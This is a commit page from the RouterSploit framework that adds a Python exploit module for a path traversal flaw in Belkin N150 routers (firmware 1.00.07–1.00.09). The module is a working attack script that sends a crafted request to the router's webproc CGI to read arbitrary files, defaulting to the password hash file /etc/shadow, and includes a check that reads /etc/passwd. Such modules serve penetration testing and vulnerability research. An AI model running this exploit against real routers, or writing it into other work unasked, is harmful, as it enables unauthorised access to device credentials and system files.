belkin n150 path traversal exploit

8c2bbe68 · Marcin Bury · e4ded9a3 · 8c2bbe68 · 8c2bbe68
Commit 8c2bbe68 authored Apr 01, 2016 by Marcin Bury
Show whitespace changes
Inline Side-by-side

Showing with 64 additions and 0 deletions

__init__.py routersploit/modules/exploits/belkin/__init__.py +0 -0

n150_path_traversal.py routersploit/modules/exploits/belkin/n150_path_traversal.py +64 -0

No files found.
--- a/routersploit/modules/exploits/belkin/__init__.py
+++ b/routersploit/modules/exploits/belkin/__init__.py
--- a/routersploit/modules/exploits/belkin/n150_path_traversal.py
+++ b/routersploit/modules/exploits/belkin/n150_path_traversal.py
+import requests
+
+from routersploit import *
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for Belkin N150 Path Traversal vulnerability.
+    If the target is vulnerable, content of the specified file is returned.
+    """
+    __info__ = {
+        'name': 'Belkin N150 Path Traversal',
+        'description': 'Module exploits Belkin N150 Path Traversal vulnerability which allows to read any file on the system.',
+        'authors': [
+            'Aditya Lad', # vulnerability discovery
+            'Rahul Pratap Singh', # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
+        ],
+        'references': [
+            'https://www.exploit-db.com/exploits/38488/',
+            'http://www.belkin.com/us/support-article?articleNum=109400',
+            'http://www.kb.cert.org/vuls/id/774788',
+        ],
+        'targets': [
+            'Belkin N150 1.00.07',
+            'Belkin N150 1.00.08',
+            'Belkin N150 1.00.09',
+        ]
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
+    port = exploits.Option(80, 'Target Port')
+    filename = exploits.Option('/etc/shadow', 'File to read')
+
+    def run(self):
+        url = sanitize_url("{}:{}/cgi-bin/webproc?getpage={}&var:page=deviceinfo".format(self.target, self.port, self.filename))
+
+        try:
+            r = requests.get(url, verify=False)
+            res = r.text
+        except requests.exceptions.ConnectionError:
+            print_error("Connection error: %s" % url)
+            return
+
+        if len(res):
+            print_success("Success! File: %s" % self.filename)
+            print res
+        else:
+            print_error("Exploit failed")
+
+    def check(self):
+        url = sanitize_url("{}:{}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo".format(self.target, self.port))
+
+        try:
+            r = requests.get(url, verify=False)
+            res = r.text
+        except:
+            return None # could not verify
+
+        if "root:" in res:
+            return True # target vulnerable
+
+        return False # target is not vulnerable
+